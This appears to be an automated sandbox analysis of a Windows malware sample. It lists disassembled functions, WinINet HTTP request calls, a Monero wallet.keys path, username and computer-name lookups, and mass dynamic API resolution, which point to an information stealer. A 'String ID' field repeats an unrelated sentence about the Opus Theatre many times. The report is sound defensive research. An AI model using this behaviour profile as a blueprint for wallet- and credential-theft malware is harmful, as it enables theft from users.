                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 168abaa1972221527f8c8f75a4a5d4720c81a4f7b42a4bf7189d6392a0145aee
                              • Instruction ID: 412afa3ee63813ee8bae675fc3dbf18075b7de519d7086871b2022a79ffa0d09
                              • Opcode Fuzzy Hash: 168abaa1972221527f8c8f75a4a5d4720c81a4f7b42a4bf7189d6392a0145aee
                              • Instruction Fuzzy Hash: 6341D360BCB6087A962CB7B58C6DADFB652FF46F01F90D85DE80C57280E6F06A00C531
                              Function 00A54880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 a54880-a54942 call a6a7a0 call a547b0 call a6a740 * 5 InternetOpenA StrCmpCA 816 a54944 801->816 817 a5494b-a5494f 801->817 816->817 818 a54955-a54acd call a68b60 call a6a920 call a6a8a0 call a6a800 * 2 call a6a9b0 call a6a8a0 call a6a800 call a6a9b0 call a6a8a0 call a6a800 call a6a920 call a6a8a0 call a6a800 call a6a9b0 call a6a8a0 call a6a800 call a6a9b0 call a6a8a0 call a6a800 call a6a9b0 call a6a920 call a6a8a0 call a6a800 * 2 InternetConnectA 817->818 819 a54ecb-a54ef3 InternetCloseHandle call a6aad0 call a59ac0 817->819 818->819 905 a54ad3-a54ad7 818->905 829 a54ef5-a54f2d call a6a820 call a6a9b0 call a6a8a0 call a6a800 819->829 830 a54f32-a54fa2 call a68990 * 2 call a6a7a0 call a6a800 * 8 819->830 829->830 906 a54ae5 905->906 907 a54ad9-a54ae3 905->907 908 a54aef-a54b22 HttpOpenRequestA 906->908 907->908 909 a54ebe-a54ec5 InternetCloseHandle 908->909 910 a54b28-a54e28 call a6a9b0 call a6a8a0 call a6a800 call a6a920 call a6a8a0 call a6a800 call a6a9b0 call a6a8a0 call a6a800 call a6a9b0 call a6a8a0 call a6a800 call a6a9b0 call a6a8a0 call a6a800 call a6a9b0 call a6a8a0 call a6a800 call a6a920 call a6a8a0 call a6a800 call a6a9b0 call a6a8a0 call a6a800 call a6a9b0 call a6a8a0 call a6a800 call a6a920 call a6a8a0 call a6a800 call a6a9b0 call a6a8a0 call a6a800 call a6a9b0 call a6a8a0 call a6a800 call a6a9b0 call a6a8a0 call a6a800 call a6a9b0 call a6a8a0 call a6a800 call a6a920 call a6a8a0 call a6a800 call a6a740 call a6a920 * 2 call a6a8a0 call a6a800 * 2 call a6aad0 lstrlen call a6aad0 * 2 lstrlen call a6aad0 HttpSendRequestA 908->910 909->819 1021 a54e32-a54e5c InternetReadFile 910->1021 1022 a54e67-a54eb9 InternetCloseHandle call a6a800 1021->1022 1023 a54e5e-a54e65 1021->1023 1022->909 1023->1022 1024 a54e69-a54ea7 call a6a9b0 call a6a8a0 call a6a800 1023->1024 1024->1021
                              APIs
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A54839
                                • Part of subcall function 00A547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A54849
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00A54915
                              • StrCmpCA.SHLWAPI(?,0144F340), ref: 00A5493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A54ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00A70DDB,00000000,?,?,00000000,?,",00000000,?,0144F270), ref: 00A54DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00A54E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00A54E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00A54E49
                              • InternetCloseHandle.WININET(00000000), ref: 00A54EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00A54EC5
                              • HttpOpenRequestA.WININET(00000000,0144F290,?,0144EB08,00000000,00000000,00400100,00000000), ref: 00A54B15
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                              • InternetCloseHandle.WININET(00000000), ref: 00A54ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: f5b68c03debb481d5be730d294b0424dca4ebf08b879e21f91a368094461a4b8
                              • Instruction ID: 78434c52909be07ec299340cab8ad631b159050bb4e0edc5facaaa0910e8bdbb
                              • Opcode Fuzzy Hash: f5b68c03debb481d5be730d294b0424dca4ebf08b879e21f91a368094461a4b8
                              • Instruction Fuzzy Hash: F812CB72910118AADB15EB90DEA6FEEB378BF24300F504599B51673091EF702F49CFA2
                              Function 00A678E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A67910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A67917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 00A6792F
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 9acf648cab630b8b4160d911db5801d73e37c26fc8b4f35d8dfc913a630b578c
                              • Instruction ID: 484970bb32e35e5743fa49c59e0d104982b6dffa8ff206ea57d41a19bfda8681
                              • Opcode Fuzzy Hash: 9acf648cab630b8b4160d911db5801d73e37c26fc8b4f35d8dfc913a630b578c
                              • Instruction Fuzzy Hash: 320181B2A14208EBD740DF99DD49FAEBBF8FB04B25F10425AFA55E32C0C37459008BA1
                              Function 00A67850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A511B7), ref: 00A67880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A67887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A6789F
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 0365402ecbb29c75c9c7ffb71d172136688914a351713eff9e966d6fd1b88036
                              • Instruction ID: 52d3a81daa05aa6d9067b4045b0bed67bebed8b2041c1e2109ff49b31c272840
                              • Opcode Fuzzy Hash: 0365402ecbb29c75c9c7ffb71d172136688914a351713eff9e966d6fd1b88036
                              • Instruction Fuzzy Hash: 17F04FB1D44208ABC700DF99DD4ABAEBBB8FB04711F10065AFA05A3680C77459048BE1
                              Function 00A51160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 536a229e63b283b85a68a01c5305c2e78693127ca523821ae011cbc162757d60
                              • Instruction ID: 970d59913aff7d2a0336b5732e3bf9fb5818aa5c7c32b67e560c1cfeaf74ed48
                              • Opcode Fuzzy Hash: 536a229e63b283b85a68a01c5305c2e78693127ca523821ae011cbc162757d60
                              • Instruction Fuzzy Hash: 0FD09E7490430CEBCB04DFE1D94E7EDBB78FB0C716F101699DD0562340EA315995CAA6
                              Function 00A69C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 a69c10-a69c1a 634 a6a036-a6a0ca LoadLibraryA * 8 633->634 635 a69c20-a6a031 GetProcAddress * 43 633->635 636 a6a146-a6a14d 634->636 637 a6a0cc-a6a141 GetProcAddress * 5 634->637 635->634 638 a6a216-a6a21d 636->638 639 a6a153-a6a211 GetProcAddress * 8 636->639 637->636 640 a6a21f-a6a293 GetProcAddress * 5 638->640 641 a6a298-a6a29f 638->641 639->638 640->641 642 a6a337-a6a33e 641->642 643 a6a2a5-a6a332 GetProcAddress * 6 641->643 644 a6a344-a6a41a GetProcAddress * 9 642->644 645 a6a41f-a6a426 642->645 643->642 644->645 646 a6a4a2-a6a4a9 645->646 647 a6a428-a6a49d GetProcAddress * 5 645->647 648 a6a4dc-a6a4e3 646->648 649 a6a4ab-a6a4d7 GetProcAddress * 2 646->649 647->646 650 a6a515-a6a51c 648->650 651 a6a4e5-a6a510 GetProcAddress * 2 648->651 649->648 652 a6a612-a6a619 650->652 653 a6a522-a6a60d GetProcAddress * 10 650->653 651->650 654 a6a67d-a6a684 652->654 655 a6a61b-a6a678 GetProcAddress * 4 652->655 653->652 656 a6a686-a6a699 GetProcAddress 654->656 657 a6a69e-a6a6a5 654->657 655->654 656->657 658 a6a6a7-a6a703 GetProcAddress * 4 657->658 659 a6a708-a6a709 657->659 658->659
                              APIs
                              • GetProcAddress.KERNEL32(77190000,01435648), ref: 00A69C2D
                              • GetProcAddress.KERNEL32(77190000,01435668), ref: 00A69C45
                              • GetProcAddress.KERNEL32(77190000,01448FF0), ref: 00A69C5E
                              • GetProcAddress.KERNEL32(77190000,01449038), ref: 00A69C76
                              • GetProcAddress.KERNEL32(77190000,01449068), ref: 00A69C8E
                              • GetProcAddress.KERNEL32(77190000,0144D050), ref: 00A69CA7
                              • GetProcAddress.KERNEL32(77190000,0143A690), ref: 00A69CBF
                              • GetProcAddress.KERNEL32(77190000,0144D218), ref: 00A69CD7
                              • GetProcAddress.KERNEL32(77190000,0144D0C8), ref: 00A69CF0
                              • GetProcAddress.KERNEL32(77190000,0144D0B0), ref: 00A69D08
                              • GetProcAddress.KERNEL32(77190000,0144D2A8), ref: 00A69D20
                              • GetProcAddress.KERNEL32(77190000,01435688), ref: 00A69D39
                              • GetProcAddress.KERNEL32(77190000,01435548), ref: 00A69D51
                              • GetProcAddress.KERNEL32(77190000,014354C8), ref: 00A69D69
                              • GetProcAddress.KERNEL32(77190000,014353C8), ref: 00A69D82
                              • GetProcAddress.KERNEL32(77190000,0144D170), ref: 00A69D9A
                              • GetProcAddress.KERNEL32(77190000,0144D068), ref: 00A69DB2
                              • GetProcAddress.KERNEL32(77190000,0143A910), ref: 00A69DCB
                              • GetProcAddress.KERNEL32(77190000,01435728), ref: 00A69DE3
                              • GetProcAddress.KERNEL32(77190000,0144D278), ref: 00A69DFB
                              • GetProcAddress.KERNEL32(77190000,0144D2D8), ref: 00A69E14
                              • GetProcAddress.KERNEL32(77190000,0144D2F0), ref: 00A69E2C
                              • GetProcAddress.KERNEL32(77190000,0144D260), ref: 00A69E44
                              • GetProcAddress.KERNEL32(77190000,01435388), ref: 00A69E5D
                              • GetProcAddress.KERNEL32(77190000,0144D230), ref: 00A69E75
                              • GetProcAddress.KERNEL32(77190000,0144D158), ref: 00A69E8D
                              • GetProcAddress.KERNEL32(77190000,0144D1A0), ref: 00A69EA6
                              • GetProcAddress.KERNEL32(77190000,0144D080), ref: 00A69EBE
                              • GetProcAddress.KERNEL32(77190000,0144D290), ref: 00A69ED6
                              • GetProcAddress.KERNEL32(77190000,0144D0E0), ref: 00A69EEF
                              • GetProcAddress.KERNEL32(77190000,0144D128), ref: 00A69F07
                              • GetProcAddress.KERNEL32(77190000,0144D2C0), ref: 00A69F1F
                              • GetProcAddress.KERNEL32(77190000,0144D200), ref: 00A69F38
                              • GetProcAddress.KERNEL32(77190000,0143FE68), ref: 00A69F50
                              • GetProcAddress.KERNEL32(77190000,0144D188), ref: 00A69F68
                              • GetProcAddress.KERNEL32(77190000,0144D308), ref: 00A69F81
                              • GetProcAddress.KERNEL32(77190000,01435428), ref: 00A69F99
                              • GetProcAddress.KERNEL32(77190000,0144D248), ref: 00A69FB1
                              • GetProcAddress.KERNEL32(77190000,014354A8), ref: 00A69FCA
                              • GetProcAddress.KERNEL32(77190000,0144D0F8), ref: 00A69FE2
                              • GetProcAddress.KERNEL32(77190000,0144D110), ref: 00A69FFA
                              • GetProcAddress.KERNEL32(77190000,01435568), ref: 00A6A013
                              • GetProcAddress.KERNEL32(77190000,01435588), ref: 00A6A02B
                              • LoadLibraryA.KERNEL32(0144D140,?,00A65CA3,00A70AEB,?,?,?,?,?,?,?,?,?,?,00A70AEA,00A70AE3), ref: 00A6A03D
                              • LoadLibraryA.KERNEL32(0144D098,?,00A65CA3,00A70AEB,?,?,?,?,?,?,?,?,?,?,00A70AEA,00A70AE3), ref: 00A6A04E
                              • LoadLibraryA.KERNEL32(0144D1B8,?,00A65CA3,00A70AEB,?,?,?,?,?,?,?,?,?,?,00A70AEA,00A70AE3), ref: 00A6A060
                              • LoadLibraryA.KERNEL32(0144D1E8,?,00A65CA3,00A70AEB,?,?,?,?,?,?,?,?,?,?,00A70AEA,00A70AE3), ref: 00A6A072
                              • LoadLibraryA.KERNEL32(0144D1D0,?,00A65CA3,00A70AEB,?,?,?,?,?,?,?,?,?,?,00A70AEA,00A70AE3), ref: 00A6A083
                              • LoadLibraryA.KERNEL32(0144D320,?,00A65CA3,00A70AEB,?,?,?,?,?,?,?,?,?,?,00A70AEA,00A70AE3), ref: 00A6A095
                              • LoadLibraryA.KERNEL32(0144D038,?,00A65CA3,00A70AEB,?,?,?,?,?,?,?,?,?,?,00A70AEA,00A70AE3), ref: 00A6A0A7
                              • LoadLibraryA.KERNEL32(0144D4A0,?,00A65CA3,00A70AEB,?,?,?,?,?,?,?,?,?,?,00A70AEA,00A70AE3), ref: 00A6A0B8
                              • GetProcAddress.KERNEL32(77040000,01435268), ref: 00A6A0DA
                              • GetProcAddress.KERNEL32(77040000,0144D608), ref: 00A6A0F2
                              • GetProcAddress.KERNEL32(77040000,01448C58), ref: 00A6A10A
                              • GetProcAddress.KERNEL32(77040000,0144D530), ref: 00A6A123
                              • GetProcAddress.KERNEL32(77040000,01435328), ref: 00A6A13B
                              • GetProcAddress.KERNEL32(70530000,0143A6B8), ref: 00A6A160
                              • GetProcAddress.KERNEL32(70530000,01435208), ref: 00A6A179
                              • GetProcAddress.KERNEL32(70530000,0143A6E0), ref: 00A6A191
                              • GetProcAddress.KERNEL32(70530000,0144D590), ref: 00A6A1A9
                              • GetProcAddress.KERNEL32(70530000,0144D620), ref: 00A6A1C2
                              • GetProcAddress.KERNEL32(70530000,01435188), ref: 00A6A1DA
                              • GetProcAddress.KERNEL32(70530000,014350E8), ref: 00A6A1F2
                              • GetProcAddress.KERNEL32(70530000,0144D5A8), ref: 00A6A20B
                              • GetProcAddress.KERNEL32(768D0000,01435348), ref: 00A6A22C
                              • GetProcAddress.KERNEL32(768D0000,01435368), ref: 00A6A244
                              • GetProcAddress.KERNEL32(768D0000,0144D338), ref: 00A6A25D
                              • GetProcAddress.KERNEL32(768D0000,0144D5C0), ref: 00A6A275
                              • GetProcAddress.KERNEL32(768D0000,01435148), ref: 00A6A28D
                              • GetProcAddress.KERNEL32(75790000,0143A780), ref: 00A6A2B3
                              • GetProcAddress.KERNEL32(75790000,0143A7D0), ref: 00A6A2CB
                              • GetProcAddress.KERNEL32(75790000,0144D548), ref: 00A6A2E3
                              • GetProcAddress.KERNEL32(75790000,01435228), ref: 00A6A2FC
                              • GetProcAddress.KERNEL32(75790000,014351A8), ref: 00A6A314
                              • GetProcAddress.KERNEL32(75790000,0143A7A8), ref: 00A6A32C
                              • GetProcAddress.KERNEL32(75A10000,0144D380), ref: 00A6A352
                              • GetProcAddress.KERNEL32(75A10000,01434FC8), ref: 00A6A36A
                              • GetProcAddress.KERNEL32(75A10000,01448B68), ref: 00A6A382
                              • GetProcAddress.KERNEL32(75A10000,0144D398), ref: 00A6A39B
                              • GetProcAddress.KERNEL32(75A10000,0144D350), ref: 00A6A3B3
                              • GetProcAddress.KERNEL32(75A10000,014351E8), ref: 00A6A3CB
                              • GetProcAddress.KERNEL32(75A10000,014352E8), ref: 00A6A3E4
                              • GetProcAddress.KERNEL32(75A10000,0144D368), ref: 00A6A3FC
                              • GetProcAddress.KERNEL32(75A10000,0144D3B0), ref: 00A6A414
                              • GetProcAddress.KERNEL32(76850000,01434F88), ref: 00A6A436
                              • GetProcAddress.KERNEL32(76850000,0144D488), ref: 00A6A44E
                              • GetProcAddress.KERNEL32(76850000,0144D500), ref: 00A6A466
                              • GetProcAddress.KERNEL32(76850000,0144D458), ref: 00A6A47F
                              • GetProcAddress.KERNEL32(76850000,0144D560), ref: 00A6A497
                              • GetProcAddress.KERNEL32(75690000,01434FA8), ref: 00A6A4B8
                              • GetProcAddress.KERNEL32(75690000,01435028), ref: 00A6A4D1
                              • GetProcAddress.KERNEL32(769C0000,01435248), ref: 00A6A4F2
                              • GetProcAddress.KERNEL32(769C0000,0144D3C8), ref: 00A6A50A
                              • GetProcAddress.KERNEL32(6F8C0000,014351C8), ref: 00A6A530
                              • GetProcAddress.KERNEL32(6F8C0000,01435168), ref: 00A6A548
                              • GetProcAddress.KERNEL32(6F8C0000,01434FE8), ref: 00A6A560
                              • GetProcAddress.KERNEL32(6F8C0000,0144D470), ref: 00A6A579
                              • GetProcAddress.KERNEL32(6F8C0000,01435068), ref: 00A6A591
                              • GetProcAddress.KERNEL32(6F8C0000,01435048), ref: 00A6A5A9
                              • GetProcAddress.KERNEL32(6F8C0000,01435288), ref: 00A6A5C2
                              • GetProcAddress.KERNEL32(6F8C0000,014352A8), ref: 00A6A5DA
                              • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00A6A5F1
                              • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00A6A607
                              • GetProcAddress.KERNEL32(75D90000,0144D3E0), ref: 00A6A629
                              • GetProcAddress.KERNEL32(75D90000,01448C18), ref: 00A6A641
                              • GetProcAddress.KERNEL32(75D90000,0144D3F8), ref: 00A6A659
                              • GetProcAddress.KERNEL32(75D90000,0144D410), ref: 00A6A672
                              • GetProcAddress.KERNEL32(76470000,01435008), ref: 00A6A693
                              • GetProcAddress.KERNEL32(70200000,0144D428), ref: 00A6A6B4
                              • GetProcAddress.KERNEL32(70200000,014352C8), ref: 00A6A6CD
                              • GetProcAddress.KERNEL32(70200000,0144D4B8), ref: 00A6A6E5
                              • GetProcAddress.KERNEL32(70200000,0144D4D0), ref: 00A6A6FD
                              Strings
                              Memory Dump Source
